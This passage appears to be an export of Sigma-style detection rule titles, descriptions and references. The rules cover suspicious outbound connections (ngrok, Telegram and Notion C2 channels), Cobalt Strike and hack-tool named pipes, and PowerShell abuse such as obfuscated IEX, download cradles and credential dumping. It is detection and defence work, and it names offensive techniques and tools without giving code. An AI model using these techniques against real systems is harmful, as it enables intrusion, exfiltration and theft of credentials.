https://www.poolwatch.io/coin/monero, https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt, https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files |
New Connection Initiated To Potential Dead Drop Resolver Domain |
Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.
In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
|
https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/, https://securelist.com/the-tetrade-brazilian-banking-malware/97779/, https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html, https://github.com/kleiton0x00/RedditC2, https://twitter.com/kleiton0x7e/status/1600567316810551296, https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al |
Network Connection Initiated To DevTunnels Domain |
Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2, https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security, https://cydefops.com/devtunnels-unleashed |
Suspicious Dropbox API Usage |
Detects an executable that isn't dropbox but communicates with the Dropbox API |
https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb, https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east |
Suspicious Network Connection to IP Lookup Service APIs |
Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. |
https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a, https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html |
Suspicious Non-Browser Network Communication With Google API |
Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
|
https://github.com/looCiprian/GC2-sheet, https://youtu.be/n2dFlSaBBKo, https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf, https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/, https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/ |
Communication To LocaltoNet Tunneling Service Initiated |
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
|
https://localtonet.com/documents/supported-tunnels, https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications |
Network Connection Initiated To Mega.nz |
Detects a network connection initiated by a binary to "api.mega.co.nz".
Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.
|
https://megatools.megous.com/, https://www.mandiant.com/resources/russian-targeting-gov-business |
Process Initiated Network Connection To Ngrok Domain |
Detects an executable initiating a network connection to "ngrok" domains.
Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
|
https://ngrok.com/, https://ngrok.com/blog-post/new-ngrok-domains, https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/, https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf |
Communication To Ngrok Tunneling Service Initiated |
Detects an executable initiating a network connection to "ngrok" tunneling domains.
Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
|
https://twitter.com/hakluke/status/1587733971814977537/photo/1, https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent |
Potentially Suspicious Network Connection To Notion API |
Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" |
https://github.com/mttaggart/OffensiveNotion, https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332 |
Network Communication Initiated To Portmap.IO Domain |
Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors |
https://portmap.io/, https://github.com/rapid7/metasploit-framework/issues/11337, https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2 |
Suspicious Non-Browser Network Communication With Telegram API |
Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2 |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf |
Network Connection Initiated To Visual Studio Code Tunnels Domain |
Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://cydefops.com/vscode-data-exfiltration |
Network Connection Initiated By Eqnedt32.EXE |
Detects network connections from the Equation Editor process "eqnedt32.exe". |
https://twitter.com/forensicitguy/status/1513538712986079238, https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/, https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/ |
Network Connection Initiated By IMEWDBLD.EXE |
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download, https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/ |
Network Connection Initiated Via Notepad.EXE |
Detects a network connection that is initiated by the "notepad.exe" process.
This might be a sign of process injection from a beacon process or something similar.
Notepad rarely initiates a network communication except when printing documents for example.
|
https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf, https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet |
Office Application Initiated Network Connection To Non-Local IP |
Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.
This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
This rule will require an initial baseline and tuning that is specific to your organization.
|
https://corelight.com/blog/detecting-cve-2021-42292, https://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide |
Office Application Initiated Network Connection Over Uncommon Ports |
Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports. |
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
Python Initiated Connection |
Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python, https://pypi.org/project/scapy/ |
Outbound RDP Connections Over Non-Standard Tools |
Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.
An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
|
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708 |
RDP Over Reverse SSH Tunnel |
Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 |
https://twitter.com/cyb3rops/status/1096842275437625346 |
RDP to HTTP or HTTPS Target Ports |
Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 |
https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg, https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling |
RegAsm.EXE Initiating Network Connection To Public IP |
Detects "RegAsm.exe" initiating a network connection to public IP adresses |
https://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/, https://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/, https://lolbas-project.github.io/lolbas/Binaries/Regasm/ |
Remote Access Tool - AnyDesk Incoming Connection |
Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows, https://asec.ahnlab.com/en/40263/ |
Silenttrinity Stager Msbuild Activity |
Detects a possible remote connections to Silenttrinity c2 |
https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/ |
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location |
Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
|
https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo |
Network Connection Initiated By Regsvr32.EXE |
Detects a network connection initiated by "Regsvr32.exe" |
https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/, https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ |
Potentially Suspicious Malware Callback Communication |
Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
|
https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo |
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder |
Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. |
https://twitter.com/M_haggis/status/900741347035889665, https://twitter.com/M_haggis/status/1032799638213066752, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1 |
Microsoft Sync Center Suspicious Network Connections |
Detects suspicious connections from Microsoft Sync Center to non-private IPs. |
https://redcanary.com/blog/intelligence-insights-november-2021/ |
Rundll32 Internet Connection |
Detects a rundll32 that communicates with public IP addresses |
https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100 |
Uncommon Outbound Kerberos Connection |
Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
|
https://github.com/GhostPack/Rubeus |
Potential Remote PowerShell Session Initiated |
Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.
This could potentially indicates a remote PowerShell connection.
|
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Communication To Uncommon Destination Ports |
Detects programs that connect to uncommon destination ports |
https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo |
Outbound Network Connection To Public IP Via Winlogon |
Detects a "winlogon.exe" process that initiate network communications with public IP addresses |
https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ |
Suspicious Outbound SMTP Connections |
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
The data may also be sent to an alternate network location from the main command and control server.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp, https://www.ietf.org/rfc/rfc2821.txt |
CobaltStrike Named Pipe |
Detects the creation of a named pipe as used by CobaltStrike |
https://twitter.com/d4rksystem/status/1357010969264873472, https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/, https://github.com/SigmaHQ/sigma/issues/253, https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/, https://redcanary.com/threat-detection-report/threats/cobalt-strike/ |
Suspicious Network Connection Binary No CommandLine |
Detects suspicious network connections made by a well-known Windows binary run with no command line parameters |
https://redcanary.com/blog/raspberry-robin/ |
ADFS Database Named Pipe Connection By Uncommon Tool |
Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).
Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.
|
https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml, https://o365blog.com/post/adfs/, https://github.com/Azure/SimuLand |
Suspicious Wordpad Outbound Connections |
Detects a network connection initiated by "wordpad.exe" over uncommon destination ports.
This might indicate potential process injection activity from a beacon or similar mechanisms.
|
https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit |
CobaltStrike Named Pipe Pattern Regex |
Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles |
https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575, https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 |
Outbound Network Connection Initiated By Script Interpreter |
Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads. |
https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md |
Potentially Suspicious Wuauclt Network Connection |
Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
|
https://dtm.uk/wuauclt/ |
Local Network Connection Initiated By Script Interpreter |
Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
|
https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md |
CobaltStrike Named Pipe Patterns |
Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles |
https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575, https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 |
HackTool - CoercedPotato Named Pipe Creation |
Detects the pattern of a pipe name as used by the hack tool CoercedPotato |
https://blog.hackvens.fr/articles/CoercedPotato.html, https://github.com/hackvens/CoercedPotato |
HackTool - EfsPotato Named Pipe Creation |
Detects the pattern of a pipe name as used by the hack tool EfsPotato |
https://twitter.com/SBousseaden/status/1429530155291193354?s=20, https://github.com/zcgonvh/EfsPotato |
HackTool - DiagTrackEoP Default Named Pipe |
Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege. |
https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22 |
HackTool - Koh Default Named Pipe |
Detects creation of default named pipes used by the Koh tool |
https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12 |
HackTool - Credential Dumping Tools Named Pipe Created |
Detects well-known credential dumping tools execution via specific named pipe creation |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799 |
Alternate PowerShell Hosts Pipe |
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html, https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html |
New PowerShell Instance Created |
Detects the execution of PowerShell via the creation of a named pipe starting with PSHost |
https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html, https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html |
PUA - CSExec Default Named Pipe |
Detects default CSExec pipe creation |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://github.com/malcomvetter/CSExec |
PUA - PAExec Default Named Pipe |
Detects PAExec default named pipe |
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md, https://github.com/poweradminllc/PAExec |
PUA - RemCom Default Named Pipe |
Detects default RemCom pipe creation |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://github.com/kavika13/RemCom |
WMI Event Consumer Created Named Pipe |
Detects the WMI Event Consumer service scrcons.exe creating a named pipe |
https://github.com/RiccardoAncarani/LiquidSnake |
Malicious Named Pipe Created |
Detects the creation of a named pipe seen used by known APTs or malware. |
https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/, https://securelist.com/faq-the-projectsauron-apt/75533/, https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, https://www.us-cert.gov/ncas/alerts/TA17-117A, https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html, https://thedfirreport.com/2020/06/21/snatch-ransomware/, https://github.com/RiccardoAncarani/LiquidSnake, https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity, https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a, https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf, https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Nslookup PowerShell Download Cradle |
Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records. |
https://twitter.com/Alh4zr3d/status/1566489367232651264 |
PsExec Tool Execution From Suspicious Locations - PipeName |
Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
Delete Volume Shadow Copies Via WMI With PowerShell |
Shadow Copies deletion using operating systems utilities via PowerShell |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md, https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods |
PowerShell Downgrade Attack - PowerShell |
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 |
http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ |
PowerShell Called from an Executable Version Mismatch |
Detects PowerShell called from an executable by the version mismatch method |
https://adsecurity.org/?p=2921 |
Netcat The Powershell Version |
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network |
https://nmap.org/ncat/, https://github.com/besimorhino/powercat, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md |
Potential RemoteFXvGPUDisablement.EXE Abuse |
Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 |
Remote PowerShell Session (PS Classic) |
Detects remote PowerShell sessions |
https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html |
Renamed Powershell Under Powershell Channel |
Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths.
|
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Suspicious PowerShell Download |
Detects suspicious PowerShell download command |
https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html |
Use Get-NetTCPConnection |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell |
Zip A Folder With PowerShell For Staging In Temp - PowerShell |
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a |
Tamper Windows Defender - PSClassic |
Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Suspicious Non PowerShell WSMAN COM Provider |
Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. |
https://twitter.com/chadtilbury/status/1275851297770610688, https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/, https://github.com/bohops/WSMan-WinRM |
Potential Active Directory Enumeration Using AD Module - PsModule |
Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. |
https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges |
Alternate PowerShell Hosts - PowerShell Module |
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html |
Bad Opsec Powershell Code Artifacts |
focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including
Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads
that often undergo minimal changes by attackers due to bad opsec.
|
https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/, https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/, https://www.mdeditor.tw/pl/pgRt |
Clear PowerShell History - PowerShell Module |
Detects keywords that could indicate clearing PowerShell history |
https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a |
PowerShell Decompress Commands |
A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files. |
https://github.com/OTRF/detection-hackathon-apt29/issues/8, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md |
Malicious PowerShell Scripts - PoshModule |
Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance |
https://github.com/PowerShellMafia/PowerSploit, https://github.com/NetSPI/PowerUpSQL, https://github.com/CsEnox/EventViewer-UACBypass, https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu, https://github.com/nettitude/Invoke-PowerThIEf, https://github.com/S3cur3Th1sSh1t/WinPwn, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat |
Suspicious Get-ADDBAccount Usage |
Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers |
https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md |
PowerShell Get Clipboard |
A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents. |
https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md |
HackTool - Evil-WinRm Execution - PowerShell Module |
Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.
|
https://github.com/Hackplayers/evil-winrm/blob/7514b055d67ec19836e95c05bd63e7cc47c4c2aa/evil-winrm.rb, https://github.com/search?q=repo%3AHackplayers%2Fevil-winrm++shell.run%28&type=code |
Invoke-Obfuscation CLIP+ Launcher - PowerShell Module |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher - PowerShell Module |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher - PowerShell Module |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Stdin - PowerShell Module |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA - PowerShell Module |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip - PowerShell Module |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 - PowerShell Module |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Malicious PowerShell Commandlets - PoshModule |
Detects Commandlet names from well-known PowerShell exploitation frameworks |
https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon |
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module |
